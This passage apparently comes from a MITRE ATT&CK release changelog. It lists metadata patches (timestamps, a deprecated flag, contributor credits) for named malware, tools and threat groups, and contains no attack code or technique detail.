modified2025-04-16 20:38:20.185000+00:002025-04-25 14:43:52.893000+00:00

[S0006] pwdump

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:54.480000+00:002025-04-25 14:45:24.744000+00:00

[S0227] spwebmember

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:51.100000+00:002025-04-25 14:45:16.528000+00:00

[S0225] sqlmap

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:54.328000+00:002025-04-25 14:45:24.383000+00:00

[S0653] xCaon

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:58.030000+00:002025-04-25 14:42:49.417000+00:00

[S0123] xCmd

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:51.879000+00:002025-04-25 14:45:18.852000+00:00

[S0248] yty

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:53.646000+00:002025-04-25 14:42:35.950000+00:00

mobile-attack

Patches

[S0310] ANDROIDOS_ANSERVER.A

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:08.276000+00:002025-04-25 14:40:25.685000+00:00

[S0309] Adups

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:15.993000+00:002025-04-25 14:40:45.642000+00:00

[S0440] Agent Smith

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:11.884000+00:002025-04-25 14:40:35.302000+00:00

[S1095] AhRat

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-01-24 17:12:44.782000+00:002025-04-22 21:22:24.938000+00:00
x_mitre_contributors[0]Edward StevensEdward Stevens, BT Security
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsBT Security

[S0319] Allwinner

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:03.823000+00:002025-04-25 14:40:14.772000+00:00

[S0525] Android/AdDisplay.Ashas

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:16.304000+00:002025-04-25 14:40:46.381000+00:00

[S0304] Android/Chuli.A

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:14.103000+00:002025-04-25 14:40:40.920000+00:00

[S0524] AndroidOS/MalLocker.B

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:11.027000+00:002025-04-25 14:40:32.960000+00:00

[S0540] Asacub

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.041000+00:002025-04-25 14:40:35.670000+00:00

[S0555] CHEMISTGAMES

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:11.340000+00:002025-04-25 14:40:33.676000+00:00

[S0529] CarbonSteal

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:03.013000+00:002025-04-25 14:40:13.122000+00:00

[S0480] Cerberus

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:03.157000+00:002025-04-25 14:40:13.502000+00:00

[S0323] Charger

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:14.258000+00:002025-04-25 14:40:41.299000+00:00

[S0602] Circles

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:13.137000+00:002025-04-25 14:40:38.438000+00:00

[S0426] Concipit1248

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:10.526000+00:002025-04-25 14:40:31.516000+00:00

[S0425] Corona Updates

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:07.148000+00:002025-04-25 14:40:23.129000+00:00

[S0479] DEFENSOR ID

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:08.935000+00:002025-04-25 14:40:27.329000+00:00

[S0301] Dendroid

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:06.526000+00:002025-04-25 14:40:21.321000+00:00

[S0550] DoubleAgent

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:07.802000+00:002025-04-25 14:40:24.588000+00:00

[S0300] DressCode

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:16.646000+00:002025-04-25 14:40:47.460000+00:00

[S0315] DualToy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:08.432000+00:002025-04-25 14:40:26.050000+00:00

[S0420] Dvmap

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:05.219000+00:002025-04-25 14:40:18.436000+00:00

[S0478] EventBot

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.346000+00:002025-04-25 14:40:36.402000+00:00

[S0509] FakeSpy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:10.213000+00:002025-04-25 14:40:30.790000+00:00

[S0408] FlexiSpy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:17.243000+00:002025-04-25 14:40:48.201000+00:00

[S0536] GPlayed

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.191000+00:002025-04-25 14:40:36.033000+00:00

[S0423] Ginp

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:09.244000+00:002025-04-25 14:40:28.434000+00:00

[S0535] Golden Cup

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:15.703000+00:002025-04-25 14:40:44.740000+00:00

[S0551] GoldenEagle

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:03.977000+00:002025-04-25 14:40:15.155000+00:00

[S0421] GolfSpy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.846000+00:002025-04-25 14:40:37.700000+00:00

[S0290] Gooligan

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:04.607000+00:002025-04-25 14:40:16.979000+00:00

[S0406] Gustuff

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:16.804000+00:002025-04-25 14:40:47.835000+00:00

[S0544] HenBox

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.500000+00:002025-04-25 14:40:36.765000+00:00

[S0321] HummingWhale

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:09.395000+00:002025-04-25 14:40:28.796000+00:00

[S0463] INSOMNIA

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:05.067000+00:002025-04-25 14:40:18.080000+00:00

[S0325] Judy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:04.284000+00:002025-04-25 14:40:16.257000+00:00

[S0288] KeyRaider

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:07.456000+00:002025-04-25 14:40:23.854000+00:00

[S0485] Mandrake

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:08.595000+00:002025-04-25 14:40:26.424000+00:00

[S0303] MazarBOT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:09.084000+00:002025-04-25 14:40:28.053000+00:00

[S0407] Monokle

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:09.753000+00:002025-04-25 14:40:29.512000+00:00

[S0299] NotCompatible

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:05.573000+00:002025-04-25 14:40:19.154000+00:00

[S0286] OBAD

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:13.949000+00:002025-04-25 14:40:40.325000+00:00

[S0285] OldBoot

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:04.440000+00:002025-04-25 14:40:16.618000+00:00

[S0291] PJApps

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:13.454000+00:002025-04-25 14:40:39.221000+00:00

[S0399] Pallas

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.993000+00:002025-04-25 14:40:38.069000+00:00

[S0316] Pegasus for Android

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:10.874000+00:002025-04-25 14:40:32.245000+00:00

[S0295] RCSAndroid

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:06.991000+00:002025-04-25 14:40:22.773000+00:00

[S0539] Red Alert 2.0

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:09.903000+00:002025-04-25 14:40:29.878000+00:00

[S0403] Riltok

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.694000+00:002025-04-25 14:40:37.303000+00:00

[S0411] Rotexy

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:03.463000+00:002025-04-25 14:40:14.047000+00:00

[S0313] RuMMS

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:10.719000+00:002025-04-25 14:40:31.880000+00:00

[S0294] ShiftyBug

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:13.608000+00:002025-04-25 14:40:39.602000+00:00

[S0549] SilkBean

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:14.758000+00:002025-04-25 14:40:42.577000+00:00

[S0419] SimBad

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:16.143000+00:002025-04-25 14:40:46.008000+00:00

[S0327] Skygofree

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:07.299000+00:002025-04-25 14:40:23.488000+00:00

[S0324] SpyDealer

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:10.366000+00:002025-04-25 14:40:31.154000+00:00

[S0305] SpyNote RAT

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:04.768000+00:002025-04-25 14:40:17.353000+00:00

[S0328] Stealth Mango

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:03.669000+00:002025-04-25 14:40:14.412000+00:00

[S0545] TERRACOTTA

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:15.370000+00:002025-04-25 14:40:43.667000+00:00

[S0329] Tangelo

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:06.838000+00:002025-04-25 14:40:22.408000+00:00

[S0558] Tiktok Pro

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:13.285000+00:002025-04-25 14:40:38.825000+00:00

[S0424] Triada

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:15.523000+00:002025-04-25 14:40:44.380000+00:00

[S0427] TrickMo

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:04.918000+00:002025-04-25 14:40:17.722000+00:00

[S0307] Trojan-SMS.AndroidOS.Agent.ao

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:11.724000+00:002025-04-25 14:40:34.229000+00:00

[S0306] Trojan-SMS.AndroidOS.FakeInst.a

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:05.907000+00:002025-04-25 14:40:20.063000+00:00

[S0308] Trojan-SMS.AndroidOS.OpFake.a

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:14.410000+00:002025-04-25 14:40:41.844000+00:00

[S0302] Twitoor

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:07.968000+00:002025-04-25 14:40:24.958000+00:00

[S0418] ViceLeaker

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:10.060000+00:002025-04-25 14:40:30.243000+00:00

[S0506] ViperRAT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:15.850000+00:002025-04-25 14:40:45.280000+00:00

[S0312] WireLurker

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:06.693000+00:002025-04-25 14:40:21.687000+00:00

[S0489] WolfRAT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:14.905000+00:002025-04-25 14:40:42.935000+00:00

[S0314] X-Agent for Android

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:08.784000+00:002025-04-25 14:40:26.968000+00:00

[S0318] XLoader for Android

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:05.761000+00:002025-04-25 14:40:19.697000+00:00

[S0490] XLoader for iOS

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:06.053000+00:002025-04-25 14:40:20.425000+00:00

[S0298] Xbot

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:17.393000+00:002025-04-25 14:40:48.566000+00:00

[S0297] XcodeGhost

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:14.566000+00:002025-04-25 14:40:42.212000+00:00

[S0494] Zen

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:05.422000+00:002025-04-25 14:40:18.792000+00:00

[S0287] ZergHelper

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:07.644000+00:002025-04-25 14:40:24.224000+00:00

ics-attack

Patches

[S0446] Ryuk

Current version: 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:27.373000+00:002025-04-22 22:21:23.589000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsThe DFIR Report
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsThe DFIR Report, @TheDFIRReport

Groups

enterprise-attack

Patches

[G0099] APT-C-36

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:39.643000+00:002025-04-25 14:49:32.503000+00:00

[G0006] APT1

Current version: 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:37.426000+00:002025-04-25 14:49:20.672000+00:00

[G0005] APT12

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:37.119000+00:002025-04-25 14:49:18.305000+00:00

[G0096] APT41

Current version: 4.1

Details
values_changed
STIX FieldOld valueNew Value
modified2024-10-10 14:31:35.326000+00:002025-04-22 21:56:33.318000+00:00

[G0060] BRONZE BUTLER

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:34.368000+00:002025-04-25 14:48:57.719000+00:00

[G0135] BackdoorDiplomacy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:34.519000+00:002025-04-25 14:48:58.613000+00:00

[G0063] BlackOasis

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:41.036000+00:002025-04-25 14:49:40.224000+00:00

[G0098] BlackTech

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:33.408000+00:002025-04-25 19:03:07.787000+00:00
x_mitre_contributors[1]Hannah Simes, BT SecurityHannah S

[G0008] Carbanak

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:39.338000+00:002025-04-25 14:49:30.378000+00:00

[G0079] DarkHydrus

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:39.039000+00:002025-04-25 14:49:28.547000+00:00

[G0105] DarkVishnya

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:35.190000+00:002025-04-25 14:49:05.248000+00:00

[G1003] Ember Bear

Current version: 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2024-12-03 20:19:38.721000+00:002025-04-25 19:03:38.177000+00:00
x_mitre_contributors[0]Hannah Simes, BT SecurityHannah S

[G0020] Equation

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:33.110000+00:002025-04-25 14:48:45.400000+00:00

[G0120] Evilnum

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:38.720000+00:002025-04-25 14:49:26.766000+00:00

[G0053] FIN5

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:38.089000+00:002025-04-25 14:49:23.588000+00:00

[G0137] Ferocious Kitten

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:40.731000+00:002025-04-25 14:49:38.455000+00:00

[G0036] GCMAN

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:40.552000+00:002025-04-25 14:49:37.572000+00:00

[G0084] Gallmaker

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:40.106000+00:002025-04-25 14:49:34.304000+00:00

[G0078] Gorgon Group

Current version: 1.5

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:36.314000+00:002025-04-25 14:49:11.522000+00:00

[G0136] IndigoZebra

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:41.185000+00:002025-04-25 14:49:40.589000+00:00

[G1004] LAPSUS$

Current version: 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-07 14:44:59.715000+00:002025-04-21 19:40:47.538000+00:00
x_mitre_contributors[2]Flavio Costa, CiscoFlávio Costa, @Segurança Descomplicada

[G0030] Lotus Blossom

Current version: 4.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Prinesha Dobariya']
values_changed
STIX FieldOld valueNew Value
modified2025-04-04 17:35:44.589000+00:002025-04-23 21:20:58.367000+00:00

[G0095] Machete

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:37.929000+00:002025-04-25 14:49:22.323000+00:00

[G0002] Moafee

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:41.833000+00:002025-04-25 14:49:46.105000+00:00

[G0055] NEODYMIUM

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:41.988000+00:002025-04-25 14:49:46.469000+00:00

[G0019] Naikon

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:37.579000+00:002025-04-25 14:49:21.044000+00:00

[G0068] PLATINUM

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:35.512000+00:002025-04-25 14:49:07.040000+00:00

[G0011] PittyTiger

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:40.885000+00:002025-04-25 14:49:38.981000+00:00

[G0033] Poseidon Group

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:39.948000+00:002025-04-25 14:49:33.223000+00:00

[G0048] RTM

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:34.877000+00:002025-04-25 14:49:01.288000+00:00

[G0106] Rocke

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:36.004000+00:002025-04-25 14:49:08.821000+00:00

[G0029] Scarlet Mimic

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:41.499000+00:002025-04-25 14:49:45.222000+00:00

[G0122] Silent Librarian

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:39.188000+00:002025-04-25 14:49:29.613000+00:00

[G0054] Sowbug

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:37.765000+00:002025-04-25 14:49:21.603000+00:00

[G0038] Stealth Falcon

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:35.038000+00:002025-04-25 14:49:04.710000+00:00

[G0041] Strider

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
